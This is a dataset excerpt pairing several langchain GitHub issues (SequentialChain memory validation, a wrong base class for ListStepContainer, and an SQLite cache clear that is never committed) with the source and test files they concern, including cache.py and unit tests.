Dataset schema (per-column types and value statistics):

| column | dtype | values |
| --- | --- | --- |
| status | stringclasses | 1 value |
| repo_name | stringclasses | 31 values |
| repo_url | stringclasses | 31 values |
| issue_id | int64 | 1–104k |
| title | stringlengths | 4–369 |
| body | stringlengths | 0–254k |
| issue_url | stringlengths | 37–56 |
| pull_url | stringlengths | 37–54 |
| before_fix_sha | stringlengths | 40–40 |
| after_fix_sha | stringlengths | 40–40 |
| report_datetime | unknown | n/a |
| language | stringclasses | 5 values |
| commit_datetime | unknown | n/a |
| updated_file | stringlengths | 4–188 |
| file_content | stringlengths | 0–5.12M |
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
6768
Can't use memory for an internal LLMChain inside a SequentialChain
### System Info

Langchain 0.0.214
Python 3.11.1

### Who can help?

@hwchase17

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

1. Create a `SequentialChain` that contains 2 `LLMChain`s, and add a memory to the first one.
2. When running, you'll get a validation error:

```
Missing required input keys: {'chat_history'}, only had {'human_input'} (type=value_error)
```

### Expected behavior

You should be able to add memory to one chain, not just the `SequentialChain`.
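A minimal reproduction sketch of the failure described above (hypothetical code, not taken from the report; chain layout, prompts, and variable names are illustrative, and `FakeListLLM` stands in for a real model so no API key is needed):

```python
# Hypothetical repro: a SequentialChain whose first LLMChain carries its own
# memory. On langchain <= 0.0.214 the SequentialChain validator did not credit
# the inner chain's memory key, so construction raised:
#   Missing required input keys: {'chat_history'}, only had {'human_input'}
from langchain.chains import LLMChain, SequentialChain
from langchain.llms import FakeListLLM
from langchain.memory import ConversationBufferMemory
from langchain.prompts import PromptTemplate

llm = FakeListLLM(responses=["summary text", "rewritten text"])

first = LLMChain(
    llm=llm,
    prompt=PromptTemplate(
        input_variables=["chat_history", "human_input"],
        template="{chat_history}\nHuman: {human_input}\nSummary:",
    ),
    # The memory supplies "chat_history" itself, so callers only pass
    # "human_input" -- this is what the pre-fix validator got wrong.
    memory=ConversationBufferMemory(memory_key="chat_history"),
    output_key="summary",
)
second = LLMChain(
    llm=llm,
    prompt=PromptTemplate(input_variables=["summary"], template="Rewrite: {summary}"),
    output_key="rewritten",
)

# Pre-fix: raises the validation error at construction time.
overall = SequentialChain(
    chains=[first, second],
    input_variables=["human_input"],
    output_variables=["rewritten"],
)
print(overall({"human_input": "Hello"}))
```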
https://github.com/langchain-ai/langchain/issues/6768
https://github.com/langchain-ai/langchain/pull/6769
488d2d5da95a2bacdca3d1623d862ac5ab28d59e
f307ca094b0d175d71ac424eba3d9f7ef5fc44f1
"2023-06-26T16:09:11Z"
python
"2023-07-13T06:47:44Z"
tests/unit_tests/chains/test_sequential.py
"""Test pipeline functionality.""" from typing import Dict, List, Optional import pytest from langchain.callbacks.manager import CallbackManagerForChainRun from langchain.chains.base import Chain from langchain.chains.sequential import SequentialChain, SimpleSequentialChain from langchain.memory.simple import SimpleMemory class FakeChain(Chain): """Fake Chain for testing purposes.""" input_variables: List[str] output_variables: List[str] @property def input_keys(self) -> List[str]: """Input keys this chain returns.""" return self.input_variables @property def output_keys(self) -> List[str]: """Input keys this chain returns.""" return self.output_variables def _call( self, inputs: Dict[str, str], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> Dict[str, str]: outputs = {} for var in self.output_variables: variables = [inputs[k] for k in self.input_variables] outputs[var] = f"{' '.join(variables)}foo" return outputs def test_sequential_usage_single_inputs() -> None: """Test sequential on single input chains.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) chain = SequentialChain(chains=[chain_1, chain_2], input_variables=["foo"]) output = chain({"foo": "123"}) expected_output = {"baz": "123foofoo", "foo": "123"} assert output == expected_output def test_sequential_usage_multiple_inputs() -> None: """Test sequential on multiple input chains.""" chain_1 = FakeChain(input_variables=["foo", "test"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar", "foo"], output_variables=["baz"]) chain = SequentialChain(chains=[chain_1, chain_2], input_variables=["foo", "test"]) output = chain({"foo": "123", "test": "456"}) expected_output = { "baz": "123 456foo 123foo", "foo": "123", "test": "456", } assert output == expected_output def test_sequential_usage_memory() -> None: """Test sequential usage with memory.""" memory = SimpleMemory(memories={"zab": "rab"}) chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) chain = SequentialChain( memory=memory, chains=[chain_1, chain_2], input_variables=["foo"] ) output = chain({"foo": "123"}) expected_output = {"baz": "123foofoo", "foo": "123", "zab": "rab"} assert output == expected_output memory = SimpleMemory(memories={"zab": "rab", "foo": "rab"}) chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) with pytest.raises(ValueError): SequentialChain( memory=memory, chains=[chain_1, chain_2], input_variables=["foo"] ) def test_sequential_usage_multiple_outputs() -> None: """Test sequential usage on multiple output chains.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar", "test"]) chain_2 = FakeChain(input_variables=["bar", "foo"], output_variables=["baz"]) chain = SequentialChain(chains=[chain_1, chain_2], input_variables=["foo"]) output = chain({"foo": "123"}) expected_output = { "baz": "123foo 123foo", "foo": "123", } assert output == expected_output def test_sequential_missing_inputs() -> None: """Test error is raised when input variables are missing.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar", "test"], output_variables=["baz"]) with pytest.raises(ValueError): # Also needs "test" as an input SequentialChain(chains=[chain_1, chain_2], input_variables=["foo"]) def 
test_sequential_bad_outputs() -> None: """Test error is raised when bad outputs are specified.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) with pytest.raises(ValueError): # "test" is not present as an output variable. SequentialChain( chains=[chain_1, chain_2], input_variables=["foo"], output_variables=["test"], ) def test_sequential_valid_outputs() -> None: """Test chain runs when valid outputs are specified.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) chain = SequentialChain( chains=[chain_1, chain_2], input_variables=["foo"], output_variables=["bar", "baz"], ) output = chain({"foo": "123"}, return_only_outputs=True) expected_output = {"baz": "123foofoo", "bar": "123foo"} assert output == expected_output def test_sequential_overlapping_inputs() -> None: """Test error is raised when input variables are overlapping.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar", "test"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) with pytest.raises(ValueError): # "test" is specified as an input, but also is an output of one step SequentialChain(chains=[chain_1, chain_2], input_variables=["foo", "test"]) def test_simple_sequential_functionality() -> None: """Test simple sequential functionality.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) chain = SimpleSequentialChain(chains=[chain_1, chain_2]) output = chain({"input": "123"}) expected_output = {"output": "123foofoo", "input": "123"} assert output == expected_output def test_multi_input_errors() -> None: """Test simple sequential errors if multiple input variables are expected.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar", "foo"], output_variables=["baz"]) with pytest.raises(ValueError): SimpleSequentialChain(chains=[chain_1, chain_2]) def test_multi_output_errors() -> None: """Test simple sequential errors if multiple output variables are expected.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar", "grok"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) with pytest.raises(ValueError): SimpleSequentialChain(chains=[chain_1, chain_2])
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
6231
correct the base class
https://github.com/hwchase17/langchain/blob/c7db9febb0edeba1ea108adc4423b789404ce5f2/langchain/experimental/plan_and_execute/schema.py#L31

From:
```python
class ListStepContainer(BaseModel):
```
To:
```python
class ListStepContainer(BaseStepContainer):
```
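Why the one-line change matters: without inheriting from `BaseStepContainer`, the container implements the interface's methods but is not a subclass of it, so `isinstance`-based checks against the abstract base fail. An illustrative check (hypothetical, not part of the issue):

```python
# Before the fix this prints False, even though ListStepContainer implements
# add_step/get_final_response; after the fix it prints True.
from langchain.experimental.plan_and_execute.schema import (
    BaseStepContainer,
    ListStepContainer,
)

container = ListStepContainer()
print(isinstance(container, BaseStepContainer))
```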
https://github.com/langchain-ai/langchain/issues/6231
https://github.com/langchain-ai/langchain/pull/6232
98e1bbfbbdffca55775e847899d2823f6232ebe7
af3f4010155a882b8b1021b6e0de130c628dab2c
"2023-06-15T15:16:56Z"
python
"2023-07-13T07:03:02Z"
langchain/experimental/plan_and_execute/schema.py
```python
from abc import abstractmethod
from typing import List, Tuple

from pydantic import BaseModel, Field

from langchain.schema import BaseOutputParser


class Step(BaseModel):
    value: str


class Plan(BaseModel):
    steps: List[Step]


class StepResponse(BaseModel):
    response: str


class BaseStepContainer(BaseModel):
    @abstractmethod
    def add_step(self, step: Step, step_response: StepResponse) -> None:
        """Add step and step response to the container."""

    @abstractmethod
    def get_final_response(self) -> str:
        """Return the final response based on steps taken."""


class ListStepContainer(BaseModel):
    steps: List[Tuple[Step, StepResponse]] = Field(default_factory=list)

    def add_step(self, step: Step, step_response: StepResponse) -> None:
        self.steps.append((step, step_response))

    def get_steps(self) -> List[Tuple[Step, StepResponse]]:
        return self.steps

    def get_final_response(self) -> str:
        return self.steps[-1][1].response


class PlanOutputParser(BaseOutputParser):
    @abstractmethod
    def parse(self, text: str) -> Plan:
        """Parse into a plan."""
```
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7652
SQLite LLM cache clear does not take effect
### System Info

Langchain version: 0.0.231
Python version: 3.10.11

Bug: There is an issue when clearing the LLM cache for SQLAlchemy-based caches. `langchain.llm_cache.clear()` does not clear the cache for the SQLite LLM cache.

Reason: it doesn't commit the deletion database change, so the deletion doesn't take effect.

### Who can help?

@hwchase17 @ag

### Information

- [ ] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

- Configure the SQLite LLM cache
- Call an LLM via langchain; the SQLite database gets populated with an entry
- Call `langchain.llm_cache.clear()`
- Actual behaviour: notice that the entry is still in SQLite

### Expected behavior

- Expected behaviour: the cache database table should be empty
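A sketch of the kind of fix the linked PR applies: run the delete inside a transaction block so it is committed on exit (the same `Session(...), session.begin()` pattern the cache's `update` method already uses). The subclass below is a hypothetical workaround against the pre-fix release, not the merged patch itself:

```python
"""Hedged workaround sketch for SQLAlchemyCache.clear (assumes langchain 0.0.231)."""
from typing import Any

from sqlalchemy import create_engine
from sqlalchemy.orm import Session

from langchain.cache import SQLAlchemyCache


class CommittingSQLAlchemyCache(SQLAlchemyCache):
    """Run the delete inside a transaction; session.begin() commits on exit.

    The pre-fix clear() opened a Session, deleted, and discarded the session
    without committing, so the rows were still there on the next connection.
    """

    def clear(self, **kwargs: Any) -> None:
        with Session(self.engine) as session, session.begin():
            session.query(self.cache_schema).delete()


cache = CommittingSQLAlchemyCache(engine=create_engine("sqlite://"))
cache.clear()  # now actually empties the full_llm_cache table
```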
https://github.com/langchain-ai/langchain/issues/7652
https://github.com/langchain-ai/langchain/pull/7653
c17a80f11c200e2f7a65b54eb2f2942b8a6ea3bd
24c165420827305e813f4b6d501f93d18f6d46a4
"2023-07-13T12:36:48Z"
python
"2023-07-13T13:39:04Z"
langchain/cache.py
"""Beta Feature: base interface for cache.""" from __future__ import annotations import hashlib import inspect import json import logging from abc import ABC, abstractmethod from datetime import timedelta from typing import ( TYPE_CHECKING, Any, Callable, Dict, Optional, Sequence, Tuple, Type, Union, cast, ) from sqlalchemy import Column, Integer, String, create_engine, select from sqlalchemy.engine.base import Engine from sqlalchemy.orm import Session from langchain.utils import get_from_env try: from sqlalchemy.orm import declarative_base except ImportError: from sqlalchemy.ext.declarative import declarative_base from langchain.embeddings.base import Embeddings from langchain.load.dump import dumps from langchain.load.load import loads from langchain.schema import Generation from langchain.vectorstores.redis import Redis as RedisVectorstore logger = logging.getLogger(__file__) if TYPE_CHECKING: import momento RETURN_VAL_TYPE = Sequence[Generation] def _hash(_input: str) -> str: """Use a deterministic hashing approach.""" return hashlib.md5(_input.encode()).hexdigest() def _dump_generations_to_json(generations: RETURN_VAL_TYPE) -> str: """Dump generations to json. Args: generations (RETURN_VAL_TYPE): A list of language model generations. Returns: str: Json representing a list of generations. """ return json.dumps([generation.dict() for generation in generations]) def _load_generations_from_json(generations_json: str) -> RETURN_VAL_TYPE: """Load generations from json. Args: generations_json (str): A string of json representing a list of generations. Raises: ValueError: Could not decode json string to list of generations. Returns: RETURN_VAL_TYPE: A list of generations. """ try: results = json.loads(generations_json) return [Generation(**generation_dict) for generation_dict in results] except json.JSONDecodeError: raise ValueError( f"Could not decode json to list of generations: {generations_json}" ) class BaseCache(ABC): """Base interface for cache.""" @abstractmethod def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" @abstractmethod def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" @abstractmethod def clear(self, **kwargs: Any) -> None: """Clear cache that can take additional keyword arguments.""" class InMemoryCache(BaseCache): """Cache that stores things in memory.""" def __init__(self) -> None: """Initialize with empty cache.""" self._cache: Dict[Tuple[str, str], RETURN_VAL_TYPE] = {} def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" return self._cache.get((prompt, llm_string), None) def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" self._cache[(prompt, llm_string)] = return_val def clear(self, **kwargs: Any) -> None: """Clear cache.""" self._cache = {} Base = declarative_base() class FullLLMCache(Base): # type: ignore """SQLite table for full LLM Cache (all generations).""" __tablename__ = "full_llm_cache" prompt = Column(String, primary_key=True) llm = Column(String, primary_key=True) idx = Column(Integer, primary_key=True) response = Column(String) class SQLAlchemyCache(BaseCache): """Cache that uses SQAlchemy as a backend.""" def __init__(self, engine: Engine, cache_schema: Type[FullLLMCache] = FullLLMCache): """Initialize by creating all tables.""" self.engine = engine 
self.cache_schema = cache_schema self.cache_schema.metadata.create_all(self.engine) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" stmt = ( select(self.cache_schema.response) .where(self.cache_schema.prompt == prompt) # type: ignore .where(self.cache_schema.llm == llm_string) .order_by(self.cache_schema.idx) ) with Session(self.engine) as session: rows = session.execute(stmt).fetchall() if rows: try: return [loads(row[0]) for row in rows] except Exception: logger.warning( "Retrieving a cache value that could not be deserialized " "properly. This is likely due to the cache being in an " "older format. Please recreate your cache to avoid this " "error." ) # In a previous life we stored the raw text directly # in the table, so assume it's in that format. return [Generation(text=row[0]) for row in rows] return None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update based on prompt and llm_string.""" items = [ self.cache_schema(prompt=prompt, llm=llm_string, response=dumps(gen), idx=i) for i, gen in enumerate(return_val) ] with Session(self.engine) as session, session.begin(): for item in items: session.merge(item) def clear(self, **kwargs: Any) -> None: """Clear cache.""" with Session(self.engine) as session: session.query(self.cache_schema).delete() class SQLiteCache(SQLAlchemyCache): """Cache that uses SQLite as a backend.""" def __init__(self, database_path: str = ".langchain.db"): """Initialize by creating the engine and all tables.""" engine = create_engine(f"sqlite:///{database_path}") super().__init__(engine) class RedisCache(BaseCache): """Cache that uses Redis as a backend.""" # TODO - implement a TTL policy in Redis def __init__(self, redis_: Any): """Initialize by passing in Redis instance.""" try: from redis import Redis except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) if not isinstance(redis_, Redis): raise ValueError("Please pass in Redis object.") self.redis = redis_ def _key(self, prompt: str, llm_string: str) -> str: """Compute key from prompt and llm_string""" return _hash(prompt + llm_string) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" generations = [] # Read from a Redis HASH results = self.redis.hgetall(self._key(prompt, llm_string)) if results: for _, text in results.items(): generations.append(Generation(text=text)) return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "RedisCache only supports caching of normal LLM generations, " f"got {type(gen)}" ) # Write to a Redis HASH key = self._key(prompt, llm_string) self.redis.hset( key, mapping={ str(idx): generation.text for idx, generation in enumerate(return_val) }, ) def clear(self, **kwargs: Any) -> None: """Clear cache. 
If `asynchronous` is True, flush asynchronously.""" asynchronous = kwargs.get("asynchronous", False) self.redis.flushdb(asynchronous=asynchronous, **kwargs) class RedisSemanticCache(BaseCache): """Cache that uses Redis as a vector-store backend.""" # TODO - implement a TTL policy in Redis def __init__( self, redis_url: str, embedding: Embeddings, score_threshold: float = 0.2 ): """Initialize by passing in the `init` GPTCache func Args: redis_url (str): URL to connect to Redis. embedding (Embedding): Embedding provider for semantic encoding and search. score_threshold (float, 0.2): Example: .. code-block:: python import langchain from langchain.cache import RedisSemanticCache from langchain.embeddings import OpenAIEmbeddings langchain.llm_cache = RedisSemanticCache( redis_url="redis://localhost:6379", embedding=OpenAIEmbeddings() ) """ self._cache_dict: Dict[str, RedisVectorstore] = {} self.redis_url = redis_url self.embedding = embedding self.score_threshold = score_threshold def _index_name(self, llm_string: str) -> str: hashed_index = _hash(llm_string) return f"cache:{hashed_index}" def _get_llm_cache(self, llm_string: str) -> RedisVectorstore: index_name = self._index_name(llm_string) # return vectorstore client for the specific llm string if index_name in self._cache_dict: return self._cache_dict[index_name] # create new vectorstore client for the specific llm string try: self._cache_dict[index_name] = RedisVectorstore.from_existing_index( embedding=self.embedding, index_name=index_name, redis_url=self.redis_url, ) except ValueError: redis = RedisVectorstore( embedding_function=self.embedding.embed_query, index_name=index_name, redis_url=self.redis_url, ) _embedding = self.embedding.embed_query(text="test") redis._create_index(dim=len(_embedding)) self._cache_dict[index_name] = redis return self._cache_dict[index_name] def clear(self, **kwargs: Any) -> None: """Clear semantic cache for a given llm_string.""" index_name = self._index_name(kwargs["llm_string"]) if index_name in self._cache_dict: self._cache_dict[index_name].drop_index( index_name=index_name, delete_documents=True, redis_url=self.redis_url ) del self._cache_dict[index_name] def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" llm_cache = self._get_llm_cache(llm_string) generations = [] # Read from a Hash results = llm_cache.similarity_search_limit_score( query=prompt, k=1, score_threshold=self.score_threshold, ) if results: for document in results: for text in document.metadata["return_val"]: generations.append(Generation(text=text)) return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "RedisSemanticCache only supports caching of " f"normal LLM generations, got {type(gen)}" ) llm_cache = self._get_llm_cache(llm_string) # Write to vectorstore metadata = { "llm_string": llm_string, "prompt": prompt, "return_val": [generation.text for generation in return_val], } llm_cache.add_texts(texts=[prompt], metadatas=[metadata]) class GPTCache(BaseCache): """Cache that uses GPTCache as a backend.""" def __init__( self, init_func: Union[ Callable[[Any, str], None], Callable[[Any], None], None ] = None, ): """Initialize by passing in init function (default: `None`). 
Args: init_func (Optional[Callable[[Any], None]]): init `GPTCache` function (default: `None`) Example: .. code-block:: python # Initialize GPTCache with a custom init function import gptcache from gptcache.processor.pre import get_prompt from gptcache.manager.factory import get_data_manager # Avoid multiple caches using the same file, causing different llm model caches to affect each other def init_gptcache(cache_obj: gptcache.Cache, llm str): cache_obj.init( pre_embedding_func=get_prompt, data_manager=manager_factory( manager="map", data_dir=f"map_cache_{llm}" ), ) langchain.llm_cache = GPTCache(init_gptcache) """ try: import gptcache # noqa: F401 except ImportError: raise ImportError( "Could not import gptcache python package. " "Please install it with `pip install gptcache`." ) self.init_gptcache_func: Union[ Callable[[Any, str], None], Callable[[Any], None], None ] = init_func self.gptcache_dict: Dict[str, Any] = {} def _new_gptcache(self, llm_string: str) -> Any: """New gptcache object""" from gptcache import Cache from gptcache.manager.factory import get_data_manager from gptcache.processor.pre import get_prompt _gptcache = Cache() if self.init_gptcache_func is not None: sig = inspect.signature(self.init_gptcache_func) if len(sig.parameters) == 2: self.init_gptcache_func(_gptcache, llm_string) # type: ignore[call-arg] else: self.init_gptcache_func(_gptcache) # type: ignore[call-arg] else: _gptcache.init( pre_embedding_func=get_prompt, data_manager=get_data_manager(data_path=llm_string), ) self.gptcache_dict[llm_string] = _gptcache return _gptcache def _get_gptcache(self, llm_string: str) -> Any: """Get a cache object. When the corresponding llm model cache does not exist, it will be created.""" return self.gptcache_dict.get(llm_string, self._new_gptcache(llm_string)) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up the cache data. First, retrieve the corresponding cache object using the `llm_string` parameter, and then retrieve the data from the cache based on the `prompt`. """ from gptcache.adapter.api import get _gptcache = self.gptcache_dict.get(llm_string, None) if _gptcache is None: return None res = get(prompt, cache_obj=_gptcache) if res: return [ Generation(**generation_dict) for generation_dict in json.loads(res) ] return None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache. First, retrieve the corresponding cache object using the `llm_string` parameter, and then store the `prompt` and `return_val` in the cache object. """ for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "GPTCache only supports caching of normal LLM generations, " f"got {type(gen)}" ) from gptcache.adapter.api import put _gptcache = self._get_gptcache(llm_string) handled_data = json.dumps([generation.dict() for generation in return_val]) put(prompt, handled_data, cache_obj=_gptcache) return None def clear(self, **kwargs: Any) -> None: """Clear cache.""" from gptcache import Cache for gptcache_instance in self.gptcache_dict.values(): gptcache_instance = cast(Cache, gptcache_instance) gptcache_instance.flush() self.gptcache_dict.clear() def _ensure_cache_exists(cache_client: momento.CacheClient, cache_name: str) -> None: """Create cache if it doesn't exist. 
Raises: SdkException: Momento service or network error Exception: Unexpected response """ from momento.responses import CreateCache create_cache_response = cache_client.create_cache(cache_name) if isinstance(create_cache_response, CreateCache.Success) or isinstance( create_cache_response, CreateCache.CacheAlreadyExists ): return None elif isinstance(create_cache_response, CreateCache.Error): raise create_cache_response.inner_exception else: raise Exception(f"Unexpected response cache creation: {create_cache_response}") def _validate_ttl(ttl: Optional[timedelta]) -> None: if ttl is not None and ttl <= timedelta(seconds=0): raise ValueError(f"ttl must be positive but was {ttl}.") class MomentoCache(BaseCache): """Cache that uses Momento as a backend. See https://gomomento.com/""" def __init__( self, cache_client: momento.CacheClient, cache_name: str, *, ttl: Optional[timedelta] = None, ensure_cache_exists: bool = True, ): """Instantiate a prompt cache using Momento as a backend. Note: to instantiate the cache client passed to MomentoCache, you must have a Momento account. See https://gomomento.com/. Args: cache_client (CacheClient): The Momento cache client. cache_name (str): The name of the cache to use to store the data. ttl (Optional[timedelta], optional): The time to live for the cache items. Defaults to None, ie use the client default TTL. ensure_cache_exists (bool, optional): Create the cache if it doesn't exist. Defaults to True. Raises: ImportError: Momento python package is not installed. TypeError: cache_client is not of type momento.CacheClientObject ValueError: ttl is non-null and non-negative """ try: from momento import CacheClient except ImportError: raise ImportError( "Could not import momento python package. " "Please install it with `pip install momento`." ) if not isinstance(cache_client, CacheClient): raise TypeError("cache_client must be a momento.CacheClient object.") _validate_ttl(ttl) if ensure_cache_exists: _ensure_cache_exists(cache_client, cache_name) self.cache_client = cache_client self.cache_name = cache_name self.ttl = ttl @classmethod def from_client_params( cls, cache_name: str, ttl: timedelta, *, configuration: Optional[momento.config.Configuration] = None, auth_token: Optional[str] = None, **kwargs: Any, ) -> MomentoCache: """Construct cache from CacheClient parameters.""" try: from momento import CacheClient, Configurations, CredentialProvider except ImportError: raise ImportError( "Could not import momento python package. " "Please install it with `pip install momento`." ) if configuration is None: configuration = Configurations.Laptop.v1() auth_token = auth_token or get_from_env("auth_token", "MOMENTO_AUTH_TOKEN") credentials = CredentialProvider.from_string(auth_token) cache_client = CacheClient(configuration, credentials, default_ttl=ttl) return cls(cache_client, cache_name, ttl=ttl, **kwargs) def __key(self, prompt: str, llm_string: str) -> str: """Compute cache key from prompt and associated model and settings. Args: prompt (str): The prompt run through the language model. llm_string (str): The language model version and settings. Returns: str: The cache key. """ return _hash(prompt + llm_string) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Lookup llm generations in cache by prompt and associated model and settings. Args: prompt (str): The prompt run through the language model. llm_string (str): The language model version and settings. 
Raises: SdkException: Momento service or network error Returns: Optional[RETURN_VAL_TYPE]: A list of language model generations. """ from momento.responses import CacheGet generations: RETURN_VAL_TYPE = [] get_response = self.cache_client.get( self.cache_name, self.__key(prompt, llm_string) ) if isinstance(get_response, CacheGet.Hit): value = get_response.value_string generations = _load_generations_from_json(value) elif isinstance(get_response, CacheGet.Miss): pass elif isinstance(get_response, CacheGet.Error): raise get_response.inner_exception return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Store llm generations in cache. Args: prompt (str): The prompt run through the language model. llm_string (str): The language model string. return_val (RETURN_VAL_TYPE): A list of language model generations. Raises: SdkException: Momento service or network error Exception: Unexpected response """ for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "Momento only supports caching of normal LLM generations, " f"got {type(gen)}" ) key = self.__key(prompt, llm_string) value = _dump_generations_to_json(return_val) set_response = self.cache_client.set(self.cache_name, key, value, self.ttl) from momento.responses import CacheSet if isinstance(set_response, CacheSet.Success): pass elif isinstance(set_response, CacheSet.Error): raise set_response.inner_exception else: raise Exception(f"Unexpected response: {set_response}") def clear(self, **kwargs: Any) -> None: """Clear the cache. Raises: SdkException: Momento service or network error """ from momento.responses import CacheFlush flush_response = self.cache_client.flush_cache(self.cache_name) if isinstance(flush_response, CacheFlush.Success): pass elif isinstance(flush_response, CacheFlush.Error): raise flush_response.inner_exception
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7652
SQLite LLM cache clear does not take effect
### System Info

Langchain version: 0.0.231
Python version: 3.10.11

Bug: There is an issue when clearing the LLM cache for SQLAlchemy-based caches. `langchain.llm_cache.clear()` does not clear the cache for the SQLite LLM cache.

Reason: it doesn't commit the deletion database change, so the deletion doesn't take effect.

### Who can help?

@hwchase17 @ag

### Information

- [ ] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

- Configure the SQLite LLM cache
- Call an LLM via langchain; the SQLite database gets populated with an entry
- Call `langchain.llm_cache.clear()`
- Actual behaviour: notice that the entry is still in SQLite

### Expected behavior

- Expected behaviour: the cache database table should be empty
https://github.com/langchain-ai/langchain/issues/7652
https://github.com/langchain-ai/langchain/pull/7653
c17a80f11c200e2f7a65b54eb2f2942b8a6ea3bd
24c165420827305e813f4b6d501f93d18f6d46a4
"2023-07-13T12:36:48Z"
python
"2023-07-13T13:39:04Z"
tests/unit_tests/test_cache.py
"""Test caching for LLMs and ChatModels.""" from typing import Dict, Generator, List, Union import pytest from _pytest.fixtures import FixtureRequest from sqlalchemy import create_engine from sqlalchemy.orm import Session import langchain from langchain.cache import ( InMemoryCache, SQLAlchemyCache, ) from langchain.chat_models import FakeListChatModel from langchain.chat_models.base import BaseChatModel, dumps from langchain.llms import FakeListLLM from langchain.llms.base import BaseLLM from langchain.schema import ( ChatGeneration, Generation, ) from langchain.schema.messages import AIMessage, BaseMessage, HumanMessage def get_sqlite_cache() -> SQLAlchemyCache: return SQLAlchemyCache(engine=create_engine("sqlite://")) CACHE_OPTIONS = [ InMemoryCache, get_sqlite_cache, ] @pytest.fixture(autouse=True, params=CACHE_OPTIONS) def set_cache_and_teardown(request: FixtureRequest) -> Generator[None, None, None]: # Will be run before each test cache_instance = request.param langchain.llm_cache = cache_instance() if langchain.llm_cache: langchain.llm_cache.clear() else: raise ValueError("Cache not set. This should never happen.") yield # Will be run after each test if langchain.llm_cache: langchain.llm_cache.clear() langchain.llm_cache = None else: raise ValueError("Cache not set. This should never happen.") def test_llm_caching() -> None: prompt = "How are you?" response = "Test response" cached_response = "Cached test response" llm = FakeListLLM(responses=[response]) if langchain.llm_cache: langchain.llm_cache.update( prompt=prompt, llm_string=create_llm_string(llm), return_val=[Generation(text=cached_response)], ) assert llm(prompt) == cached_response else: raise ValueError( "The cache not set. This should never happen, as the pytest fixture " "`set_cache_and_teardown` always sets the cache." ) def test_old_sqlite_llm_caching() -> None: if isinstance(langchain.llm_cache, SQLAlchemyCache): prompt = "How are you?" response = "Test response" cached_response = "Cached test response" llm = FakeListLLM(responses=[response]) items = [ langchain.llm_cache.cache_schema( prompt=prompt, llm=create_llm_string(llm), 